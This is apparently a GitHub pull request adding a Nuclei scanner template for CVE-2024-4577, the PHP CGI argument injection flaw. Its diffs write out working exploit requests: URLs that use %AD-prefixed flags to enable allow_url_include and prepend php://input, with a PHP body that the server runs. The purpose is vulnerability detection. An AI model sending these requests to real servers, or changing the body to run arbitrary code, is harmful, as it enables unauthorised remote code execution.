### PR TITLE
add cve-2024-4577

### DIFF
--- a/http/cves/2024/CVE-2024-4577.yaml
+++ b/http/cves/2024/CVE-2024-4577.yaml
@@ -31,9 +31,9 @@ http:
     matchers:
       - type: word
         words:
-            - "index of"
-            - "directory"
-            - "vulnerable"
+          - "index of"
+          - "directory"
+          - "vulnerable"
         condition: or
 
       - type: status

--- a/http/cves/2024/CVE-2024-4577.yaml
+++ b/http/cves/2024/CVE-2024-4577.yaml
@@ -1,41 +1,31 @@
 id: CVE-2024-4577
 
 info:
-  name: PHP CGI Argument Injection Vulnerability
-  author: securityforeveryone
-  severity: high
+  name: PHP CGI - Argument Injection
+  author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch
+  severity: critical
   description: |
-    CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.
-  reference:
-    - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123
-    - https://github.com/TAM-K592/CVE-2024-4577/tree/main
-  tags: rce,php,cgi,cve2024,cve
+    Detects PHP CGI Argument Injection vulnerability
+  impact: |
+    Successful exploitation could lead to remote code execution on the affected system.
+  remediation: |
+    Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
+  tags: cve,cve2024,php,cgi,rce
 
-http:
-  - raw:
-      - |
-        POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
 
-        <?php echo "vulnerable"; ?>
+    body: |
+      <?php echo md5("CVE-2024-4577"); ?>
 
-      - |
-        POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        <?php echo "vulnerable"; ?>
-
-    matchers-condition: and
+    stop-at-first-match: true
     matchers:
       - type: word
+        part: body
         words:
-          - "index of"
-          - "directory"
-          - "vulnerable"
-        condition: or
-
-      - type: status
-        status:
-          - 200
+          - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"

--- a/http/cves/2024/CVE-2024-4577.yaml
+++ b/http/cves/2024/CVE-2024-4577.yaml
@@ -1,0 +1,41 @@
+id: CVE-2024-4577
+
+info:
+  name: PHP CGI Argument Injection Vulnerability
+  author: securityforeveryone
+  severity: high
+  description: |
+    CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.
+  reference:
+    - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123
+    - https://github.com/TAM-K592/CVE-2024-4577/tree/main
+  tags: rce,php,cgi,cve2024,cve
+
+http:
+  - raw:
+      - |
+        POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        <?php echo "vulnerable"; ?>
+
+      - |
+        POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        <?php echo "vulnerable"; ?>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+            - "index of"
+            - "directory"
+            - "vulnerable"
+        condition: or
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2024/CVE-2024-4577.yaml
+++ b/http/cves/2024/CVE-2024-4577.yaml
@@ -10,6 +10,8 @@ info:
     Successful exploitation could lead to remote code execution on the affected system.
   remediation: |
     Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
+  metadata:
+    verified: true
   tags: cve,cve2024,php,cgi,rce
 
 requests:

--- a/http/cves/2024/CVE-2024-4577.yaml
+++ b/http/cves/2024/CVE-2024-4577.yaml
@@ -5,7 +5,7 @@ info:
   author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch
   severity: critical
   description: |
-    Detects PHP CGI Argument Injection vulnerability
+    PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
   impact: |
     Successful exploitation could lead to remote code execution on the affected system.
   remediation: |


### PR DESCRIPTION
I tried to write the template according to the PoC file I left the link to.


https://github.com/TAM-K592/CVE-2024-4577/blob/main/cve_2024_4577.py
https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123
https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)